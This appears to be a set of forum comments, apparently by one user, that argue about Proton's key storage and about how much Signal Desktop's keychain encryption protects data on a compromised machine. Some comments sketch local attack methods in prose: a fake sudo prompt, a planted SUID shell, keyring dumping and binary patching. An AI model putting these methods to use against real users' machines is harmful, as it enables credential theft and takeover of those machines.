The Bitwarden client has all the data cached, so the server can be down and you still get access to the passwords (same for internet connection).
sudneo
You upload your private key to the cloud. Encrypted or not, this is a bad idea.
An encrypted key is a useless blob. What matters is the decryption key for that key, which is your password (or a key derived from it, I assume), which is client side.
They can do the signing and encryption with my public key
They can't sign with your public key. Signing is done using your private one, otherwise nobody can verify the signature.
Either way:
and then I’ll do the decryption with my own private key locally without them storing it.
You can do it using the bridge, exactly like you would with any client-side tooling.
Shouldn't we worry of enshittification when we are on the verge of, or on the descending side of trajectory?
So far they added features in a way that keeps respecting users rights, without changing their business model (which is 90% of the reason why companies enshittify BTW). Just because these products have something in common with products of companies who enshittified doesn't mean the same applies here.
You can use your own GPG key (https://proton.me/support/importing-openpgp-private-key or using the bridge), whatever tool does the signing needs the key (duh) so I am not sure what you mean by "they store your private key" (they stored it encrypted as per documentation https://proton.me/support/how-is-the-private-key-stored), their AI was specifically designed as local, exactly to be privacy friendly, plus is a feature that can be disabled (when it will reach general subscriptions).
I don't care about cyptocurrencies, but I suppose they started with the most popular, nothing to do with privacy as they just let you store your currencies.
Anyway, use what you like the most, of course, but yours don't look very solid motivations, quite a lot of incorrect information, I hope you didn't take your decision based on it.
I guess the answer would be "but I have a job already"...
Yes, you could run it in LAN only. You could access it via VPN only.
Obviously this adds friction in addition to security, but if that's fine with you, you can.
Thanks for the head's up!
I think this is a very real observation, with not much that can be done.
The best non-USA people can do is to participate and share/produce content which is not US-centric (ideally in their native language too). Unfortunately many communities, even non political ones, often still default to a US-centric perspective and culture, which makes it hard for people to participate.
It's hard to dance around it, more people are needed.
I am not proposing anything actually, I am implying that this change won't modify the threat model in any substantial way. Your comment implied that it kind of did, requiring root access - which is a slightly different tm, not so much on single user machines..
So my point is that "The data is safe until your user password is safe" is a very tiny change compared to "your data is safe until your device is safe". There are tons of ways to get the password once you have local access, and what I strongly disagree with is that it requires more work or risk. A sudo fake prompt requires a 10-lines bash script since you control the shell configuration, for example. And you don't even need to phish, you can simply create a SUID shell and use "sudo chmod +s shell" to any local configuration or script where the user runs a sudo command, and you are root, or you dump the keyring or...etc. Likewise, 99.9% of the users don't run integrity monitoring tools, or monitor and restrict egress access, so these attacks simply won't be noticed.
So what I am saying is that an encrypted storage is better than a plaintext storage for the key, but if this requires substantial energies from the devs that could have been put on work that substantially improved the security posture, it is a net negative in terms of security (I don't know if it is the case), and that nobody after this change should feel secure about their signal data in case their device would be compromised.
You don't need root (dump memory). You need the user password or to control the binary. Both of them relatively easy if you have user access. For example, change ENV variable to point to a patched binary first, spoof the password prompt, and then continue execution as the normal binary does.
I am saying that based on the existing risks, effort should be put on the most relevant ones for the threat model you intend to assume.
In fact the "fix" that they are providing is not changing much, simply because on single-user machines there is borderline no difference between compromising your user (i.e., physical access, you installing malware unknowingly etc.) and compromising the whole box (with root/admin access).
On Windows it's not going to have any impact at all (due to how this API is implemented), on Linux/Mac it adds a little complexity to the exploit. Once your user is compromised, your password (which is what protects the keychain) is going to be compromised very easily via internal phishing (i.e., a fake graphical prompt, a fake sudo prompt etc.) or other techniques. Sometimes it might not be necessary at all. For example, if you run signal-desktop yourself and you own the binary, an attacker with local privileges can simply patch/modify/replace the binary. So then you need other controls, like signing the binary and configuring accepted keys (this is possible and somewhat common on Mac), or something that anyway uses external trust (root user, remote server, etc.).
So my point is: if their threat model assumed that if your client device was compromised, your data was not protected, it doesn't make much sense to reduce 10/20% the risk for this to happen, and focus on other work that might be more impactful.
It's not "insecure", it's simply a supply chain risk. You have the same exact problem with any client software that you might use. There are still jurisdictions, there are still supply chain attacks. The posture is different simply by a small tradeoff: business incentive and size for proton as pluses vs quicker updates (via JS code) and slower updates vs worse security and dependency on a handful of individuals in case of other tools.
Any software that makes the crypto operations can do stuff with the keys if compromised or coerced by law enforcement to do so.
In any case, if this tradeoff doesn't suit you, the bridge allows you to use your preferred tool, so this is kinda of a moot point.
The main argument for me is that if you rely on mail and gpg not to get caught by those who can coerce proton, you are already failing.